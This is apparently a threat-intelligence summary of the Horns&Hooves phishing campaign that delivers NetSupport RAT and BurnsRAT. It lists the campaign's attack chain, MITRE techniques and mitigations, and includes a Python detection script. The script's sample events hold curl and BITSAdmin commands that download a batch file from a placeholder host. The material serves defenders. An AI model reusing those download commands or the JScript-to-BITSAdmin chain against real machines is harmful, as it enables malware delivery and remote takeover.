Full Report
A newly discovered malware campaign has been found to target private users, retailers, and service businesses mainly located in Russia to deliver NetSupport RAT and BurnsRAT. The campaign, dubbed Horns&Hooves by Kaspersky, has hit more than 1,000 victims since it began around March 2023. The end goal of these attacks is to leverage the access afforded by these trojans to install stealer
Analysis Summary
# Tool/Technique: Horns&Hooves Campaign
## Overview
The Horns&Hooves campaign is a newly discovered malware operation primarily targeting private users, retailers, and service businesses in Russia since approximately March 2023. Its primary goal is to establish initial access using RATs (NetSupport RAT, BurnsRAT) which can then be leveraged to deploy secondary stealer malware like Rhadamanthys or Meduza.
## Technical Details
- Type: Campaign / Phishing Delivery Mechanism
- Platform: Windows (implied by use of JScript, BITSAdmin, curl, NSIS installer)
- Capabilities: Phishing delivery via malicious ZIP archives containing JScript, multi-stage execution, remote access trojan deployment, secondary malware installation.
- First Seen: Around March 2023
## MITRE ATT&CK Mapping
*Note: Mappings are based on the described execution chains and delivery mechanisms.*
- **TA0001 - Initial Access**
  - T1566 - Phishing
  - T1566.001 - Spearphishing Attachment
- **TA0002 - Execution**
  - T1059.003 - Command and Scripting Interpreter: Windows Command Shell
  - T1059.005 - Command and Scripting Interpreter: Visual Basic
  - T1204.002 - User Execution: Malicious File
- **TA0011 - Command and Control**
  - T1071.001 - Application Layer Protocol: Web Protocols (implied by RAT C2 communication)
## Functionality
### Core Capabilities
- Delivery of malicious payloads (JScript) disguised as business documents (requests, bids) inside ZIP archives.
- Multi-stage execution involving JScript downloading and executing further payloads via Windows utilities.
- Use of `curl` to download a decoy image (PNG) while simultaneously retrieving and executing `bat_install.bat`.
- Reliance on `BITSAdmin` to stealthily fetch and run subsequent files, including the final RAT payloads.
### Advanced Features
- Active development of the JavaScript payload, demonstrating evolving delivery techniques (e.g., mimicking legitimate libraries like Next.js).
- Payload obfuscation/disguise, sometimes including decoy organizational documents within the ZIP archive to increase user trust.
- Two distinct RAT deployment paths observed: direct drop of NetSupport RAT or dropping an NSIS installer to deploy BurnsRAT.
- Direct injection of the NetSupport RAT payload within the JavaScript code in later variants.
## Indicators of Compromise
*Note: Specific IoCs were not provided beyond tool names; generic indicators based on the description are listed.*
- File Hashes: [Not specified in the context]
- File Names: JScript files disguised as business communication, `bat_install.bat`, Decoy PNG image name (unknown).
- Registry Keys: [Not specified in the context]
- Network Indicators: C2 servers for NetSupport RAT/BurnsRAT communication [addresses not specified in the context; would be listed defanged].
- Behavioral Indicators: Execution of `BITSAdmin` or `curl` initiated by a JScript runtime environment; NSIS installer execution; processes communicating with C2 associated with remote administration tools.
## Associated Threat Actors
- TA569 (also known as Gold Prelude, Mustard Tempest, Purple Vallhund)
- Note: Known for operating SocGholish (FakeUpdates) and acting as an Initial Access Broker (IAB) for ransomware like WastedLocker.
## Detection Methods
- Signature-based detection: Signatures for the identified RAT executables (NetSupport RAT, BurnsRAT) and stealer malware (Rhadamanthys, Meduza).
- Behavioral detection: Monitoring for JScript execution that invokes system utilities like `BITSAdmin` or `curl` to download and execute remote files, especially when packaged within ZIP archives. Monitoring for remote administration service initiation (RMS/NetSupport).
- YARA rules: Applicable for recognizing custom initial JavaScript loaders or specific characteristics of the deployed RATs.
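The behavioral detection above, as an added example that is not part of the original report: a small Python check over constructed process-creation events (a simplified Sysmon-like shape) that flags a JScript runtime (`wscript.exe`/`cscript.exe`) spawning `curl` or `BITSAdmin`, and raises the confidence when the script sits under a user data path or the child carries download arguments. Paths, the `placeholder.invalid` host and the event format are assumptions made for this example.

```python
"""Added example (not code from the Kaspersky report): flag the Horns&Hooves
delivery chain in process-creation telemetry, i.e. a JScript runtime
(wscript/cscript) spawning curl or BITSAdmin to fetch and run remote files.
The event shape and the sample events below are constructed for this example."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}      # JScript runtimes on Windows
DOWNLOADERS = {"curl.exe", "bitsadmin.exe"}        # utilities abused in the chain
USER_DATA = re.compile(r"\\(Temp|Downloads|AppData)\\", re.I)
DOWNLOAD_ARGS = re.compile(r"https?://|/transfer\b|\s-o\s|\.bat\b", re.I)

@dataclass
class ProcEvent:
    parent_image: str     # full path of the parent process
    image: str            # full path of the new process
    parent_cmdline: str
    cmdline: str

def classify(ev):
    """Return the reasons an event matches the chain; empty list if it does not."""
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    child = ev.image.rsplit("\\", 1)[-1].lower()
    if parent not in SCRIPT_HOSTS or child not in DOWNLOADERS:
        return []
    reasons = [f"{parent} spawned {child}"]
    if re.search(r"\.js\b", ev.parent_cmdline, re.I) and USER_DATA.search(ev.parent_cmdline):
        reasons.append("JScript launched from a user data path")
    if DOWNLOAD_ARGS.search(ev.cmdline):
        reasons.append("download/transfer arguments on the child")
    return reasons

def scan(events):
    """Return (index, reasons) for each event worth alerting on."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]

# Constructed sample telemetry: two campaign-like chains and one benign admin use.
# Hosts use a placeholder domain; no real C2 address is given in the summary.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\curl.exe",
              r'wscript.exe "C:\Users\u\AppData\Local\Temp\zip_tmp\request.js"',
              "curl.exe http://placeholder.invalid/decoy.png -o decoy.png"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\bitsadmin.exe",
              r'wscript.exe "C:\Users\u\Downloads\bid.js"',
              r"bitsadmin.exe /transfer j /download http://placeholder.invalid/bat_install.bat C:\Users\u\AppData\Local\Temp\bat_install.bat"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\bitsadmin.exe",
              "cmd.exe /c deploy.bat", "bitsadmin.exe /list"),
]
```

Running `scan(SAMPLE_EVENTS)` flags the two script-host chains with three reasons each and ignores the `cmd.exe` launched `bitsadmin /list`.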
## Mitigation Strategies
- Prevention measures: Email gateway filtering with aggressive scrutiny of ZIP files containing scripts (JScript/JS); content inspection of script attachments.
- Hardening recommendations: Disable or restrict the use of `BITSAdmin` for non-standard network activity. Implement strong application control policies to restrict execution from common user data paths. Ensure all software (especially OS components and parsing engines) is fully patched to prevent zero-day exploitation that might bypass the described execution chain.
- Network monitoring for C2 beaconing associated with RATs.
## Related Tools/Techniques
- NetSupport RAT (Primary initial access payload)
- BurnsRAT (Alternative initial access payload)
- Rhadamanthys (Secondary stealer malware)
- Meduza (Secondary stealer malware)
- Remote Manipulator System (RMS) (Used in conjunction with BurnsRAT deployment)
- SocGholish / FakeUpdates (Associated threat actor activity)